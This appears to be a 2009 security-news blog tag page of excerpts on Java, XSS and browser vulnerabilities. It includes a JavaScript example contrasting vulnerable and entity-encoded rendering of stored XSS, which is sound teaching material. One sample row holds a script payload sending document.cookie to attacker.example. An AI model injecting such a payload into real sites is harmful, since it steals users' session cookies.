
Posts Tagged ‘Java’

BASE – 3 Persistent Cross Site Scripting Vulnerabilities

Posted by Jabra on May 30. BASE, a well known Snort frontend, has 3 Persistent Cross Site Scripting Vulnerabilities. For those who don’t know, Cross-Site Scripting allows the attacker to inject JavaScript to modify the functionality of the web pages. Since this vulnerability exists in BASE, this allows [...]
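The excerpt above describes persistent (stored) XSS: attacker-controlled bytes are saved server-side and rendered into markup for every later viewer. The following is an added illustration, not BASE’s own code: it renders a constructed set of stored event rows once by naive string concatenation (the vulnerable pattern) and once through HTML-entity encoding (the fix). The row shape, field names and sample payload are assumptions made for the example.

```javascript
// Added example (not code from BASE). A stored-XSS render path, vulnerable and fixed.
// Constructed sample rows standing in for records read from the alert database;
// the field names (sid, payload) are hypothetical.
const storedEvents = [
  { sid: 1, payload: "GET /index.html HTTP/1.1" },
  // A payload an attacker got logged (e.g. via a crafted request seen by the sensor).
  { sid: 2, payload: '<script>document.location="http://attacker.example/?c="+document.cookie</script>' },
];

// Vulnerable: untrusted values are concatenated straight into the HTML, so the
// <script> in row 2 runs in the browser of every analyst who opens the page.
function renderVulnerable(rows) {
  return "<table>" +
    rows.map(r => "<tr><td>" + r.sid + "</td><td>" + r.payload + "</td></tr>").join("") +
    "</table>";
}

// Fix: entity-encode every untrusted value before it enters an element body.
// Quotes are encoded too so the same helper is safe inside attribute values.
function escapeHtml(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(value).replace(/[&<>"']/g, c => map[c]);
}

function renderSafe(rows) {
  return "<table>" +
    rows.map(r => "<tr><td>" + escapeHtml(r.sid) + "</td><td>" + escapeHtml(r.payload) + "</td></tr>").join("") +
    "</table>";
}

// Check used below: does the rendered markup still contain a live <script> tag?
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Stand-alone run: the vulnerable render carries the tag through, the safe one does not.
console.log("vulnerable render executes script:", containsScriptTag(renderVulnerable(storedEvents)));
console.log("safe render executes script:", containsScriptTag(renderSafe(storedEvents)));
```

Output encoding at the point of rendering is the durable fix; filtering on input alone misses payloads that arrive through channels the web form never sees, such as packet data logged by the sensor.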

CIS releases security configuration standards for iPhone

CIS releases security configuration standards for iPhone The nonprofit Center for Internet Security (CIS) this week released free guidelines that can help organizations develop custom policies related to use of the increasingly popular mobile device, said Blake Frantz, CTO of the CIS. The benchmarks inform users about the security configuration settings available to them on [...]

Mass Injection Compromises More than Twenty-Thousand Web Sites

Malicious Web Site / Malicious Code: Mass Injection Compromises More than Twenty-Thousand Web Sites Websense Security Labs™ Threatseeker™ Network has detected that a large compromise of legitimate Web sites is currently taking place around the globe. Thousands of legitimate Web sites have been discovered to be injected with malicious Javascript, obfuscated code that leads to [...]

FFSpy, a firefox malware PoC

Re: FFSpy, a firefox malware PoC Posted by FUDder Guy on May 25 > From: saphex <saphex_at_gmail.com> > Date: Wed, 20 May 2009 01:42:16 +0100 > > I think this is interesting, myf00.net/?p=18 > So, how does someone manage to edit the overlay file? Are they going to use some javascript from a malicious website [...]

D-Link’s CAPTCHA – A Big Question on Security

D-Link’s CAPTCHA – A Big Question on Security As per the security report, it took nearly a week for the researchers at SourceSec to detect a flaw in the implementation of CAPTCHA (completely automated public Turing test to tell humans and computers apart) by D-Link in its routers, which was originally meant to stop the [...]

Analyzing malicious PDF documents, (Sun, May 24th)

Analyzing malicious PDF documents, (Sun, May 24th) As we announced in a recent ISC diary, Adobe is changing its patching model and strategy, but it seems still JavaScript will be enabled by default in Adobe Acrobat and Reader. As a consequence, I foreshadow more PDF vulnerabilities, exploits and attacks in the near future (let’s hope [...]

Patching and Apple – Java issue, (Fri, May 22nd)

Patching and Apple – Java issue, (Fri, May 22nd) At the other end of the spectrum is Apple. There is a Java issue (CVE-2008-5353) which was reported to Sun and fixed by Sun back in December. For some reason the fix for this was not included in the recent security updates all Mac users would have [...]

Google Accelerates Chrome 2 For Windows

Google Accelerates Chrome 2 For Windows Google’s Chrome browser got faster Thursday with the release of Chrome 2.0.172.28. No, that’s not an IP address. While Microsoft prefers to hide incremental update designations in Internet Explorer to confound hackers, Google wants everyone to know that its engineers are upgrading everything as fast as they can. At [...]

Angered by Apple delay, hacker posts Mac Java attack code

Angered by Apple delay, hacker posts Mac Java attack code In an effort to draw attention to a long-standing security problem in Apple’s Mac OS X operating system, a security researcher has posted attack code that exploits the flaw. The software, which could be used by hackers to run unauthorized software on a Mac, [...]

Sun Java System Communications Express ‘search.xml’ Cross Site Scripting Vulnerability

Vuln: Sun Java System Communications Express ‘search.xml’ Cross Site Scripting Vulnerability. URL: http://www.securityfocus.com/bid/34154

Java, Serial, and an Apple , (Wed, May 20th)

Breakfast: Java, Serial, and an Apple , (Wed, May 20th) According to Julien Tinnes in the CR0 Blog, it appears that Apple’s recent security update failed to fix a Java flaw that was reported to Sun back in August 2008 and patched by Sun way back in December 2008. The upshot: according to the blog [...]

Web Toolz, (Wed, May 20th)

Web Toolz, (Wed, May 20th) Ok, a couple of web app testing tools have been recently updated/released: My buddies Kevin Johnson, Justin Searle, and the rest of the SamuraiWTF dev team have released version 0.6 of the SamuraiWTF live web testing framework CD. From the announcement: The SamuraiWTF project team is proud to announce the [...]

Researcher publishes Java proof-of-concept to urge Apple action

Researcher publishes Java proof-of-concept to urge Apple action Calling Apple’s patching process “opaque,” a security researcher has decided that publishing a proof-of-concept exploit is the best way to force the computing giant to fix a months-old flaw. URL: http://feedproxy.google.com/~r/SCMagazineHome/~3/shT93FcubG4/

Gumblar Exploit is the Most Prevalent Web Threat

Gumblar Exploit is the Most Prevalent Web Threat Malware analysts from security vendor Sophos warn that the number of pages infected with the Gumblar malicious script has recently skyrocketed, putting the exploit at the top of the list of Web threats. The impact of the previous record setter, Mal/Iframe-F, is now dwarfed in comparison. According to [...]

CVE-2009-1598 (chrome)

CVE-2009-1598 (chrome) Google Chrome executes DOM calls in response to a javascript: URI in the target attribute of a submit element within a form contained in an inline PDF file, which might allow remote attackers to bypass intended Adobe Acrobat JavaScript restrictions on accessing the document object, as demonstrated by a web site that permits [...]
